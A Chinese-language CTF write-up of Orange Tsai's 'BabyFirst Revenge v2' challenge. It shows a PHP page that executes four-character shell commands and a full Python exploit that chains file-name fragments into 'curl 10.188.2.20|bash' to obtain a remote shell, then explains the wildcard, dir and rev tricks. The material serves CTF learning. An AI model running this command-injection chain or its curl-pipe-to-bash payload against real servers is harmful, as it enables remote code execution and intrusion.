分享本題自制Dockerfile：Github

這題相比于上一題 條件更加的苛刻了 只允許執(zhí)行最多四個(gè)字符
源碼如下：

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

那我們之前的生成 ls -t>g 就不能按照最后一步 ls>>_ 來執(zhí)行了

但是我們能不能還是按照 生成命令段文件 最后通過ls來拼接命令執(zhí)行呢？

這里還是以分析Orange大大的exp為主：

Exp:

import requests
from time import sleep
from urllib import quote

payload = [
    # generate "g> ht- sl" to file "v"
    '>dir', 
    '>sl', 
    '>g\>',
    '>ht-',
    '*>v',

    # reverse file "v" to file "x", content "ls -th >g"
    '>rev',
    '*v>x',

    # generate "curl orange.tw|python;"
    # generate "curl 10.188.2.20|bash"
    '>\;\\', 
    '>sh\\', 
    '>ba\\', 
    '>\|\\', 
    '>20\\', 
    '>2.\\',
    '>8.\\', 
    '>18\\', 
    '>0.\\', 
    '>1\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # got shell
    'sh x', 
    'sh g', 
]


r = requests.get('http://10.188.2.20:17528/?reset=1')
for i in payload:
    assert len(i) <= 4
    r = requests.get('http://10.188.2.20:17528/?cmd=' + quote(i) )
    print i
    sleep(0.1)

首先生成 ls -t >g的命令文件，這里orange大大的方法真的巧妙到極致了！

• 先了解一個(gè)小trick，*在Linux中代表的是0或多個(gè)字符，比如ls *.txt 就表示了列出本目錄下所有后綴名為txt的文件，那假如單獨(dú)執(zhí)行一個(gè)*會(huì)是什么效果？
  在本地嘗試了一下 直接輸入一個(gè)星號(hào)的話Linux首先會(huì)把當(dāng)前目錄下的所有文件按字典序排序一次，然后將排序的結(jié)果當(dāng)作命令執(zhí)行，如下：
  
  ??
  
  那下圖的也可以理解了：
  
  ??
  
  因?yàn)?o匹配了 echo 和o，而他們的排序是echo在前，o在后 所以就會(huì)執(zhí)行命令 echo o

• 再認(rèn)識(shí)一下dir 這個(gè)命令在大多數(shù)系統(tǒng)中都是ls 的alias 但是有些系統(tǒng)中則沒有
  為什么我們要用這個(gè)命令呢 因?yàn)橹罢f過ls 是alphabetically （字典序）那么dir就會(huì)排在ls結(jié)果的最前面 所以我們*之后dir也是排在最前面 也就充當(dāng)了拼接文件名的角色

• 大概思路就出來了 我們要構(gòu)造ls -t>g的命令片段成幾個(gè)文件名 但是其命令段的首字母不能在d的前面，也就是不能是 特殊符號(hào) 數(shù)字 abc 而且每一段不能超過兩個(gè)字符，因?yàn)槠溆鄡蓚€(gè)字符要分配給>和\，如果你嘗試一下構(gòu)造 正常來說是沒辦法構(gòu)造出無特殊符號(hào)打頭的文件名 他總會(huì)排到dir的前面，然后更巧妙的地方來了 我們可以生成逆序的命令拼接起來，最后使用rev命令反向文件中的字符串！

• 根據(jù)之前我們對(duì)*的認(rèn)識(shí)，我們可以將倒序的命令輸入到v文件中，因?yàn)?v能匹配rev 和 v，也就是執(zhí)行了 rev v命令，然后再將倒序之后的結(jié)果>x文件中，這樣*v>x剛剛好是四個(gè)字符!

• 但是看到這里 你可能還會(huì)在嘗試過程中發(fā)現(xiàn)問題，那就是逆序之后的命令段應(yīng)該是 [dir,>sl,>g>,>t-] 那么這里會(huì)有一個(gè)問題 因?yàn)閠的字母序比s后，所以ls之后應(yīng)該是這樣的：

  
  
  Oops
  
  

  解決方法是加多一個(gè)參數(shù)h，在ls中h是用作格式化l參數(shù)之后的存儲(chǔ)量大小 使之更適合人類方式閱讀 但是如果ls只帶參數(shù)h的不帶參數(shù)l話那這個(gè)參數(shù)是毫無意義的 如圖：

  
  
  ??
  
  所以我們將>t-改成>ht-就能解決字典序的問題了

• 接下來的問題就回到了babyfirst-revenge的情況了

參考:
https://github.com/orangetw/My-CTF-Web-Challenges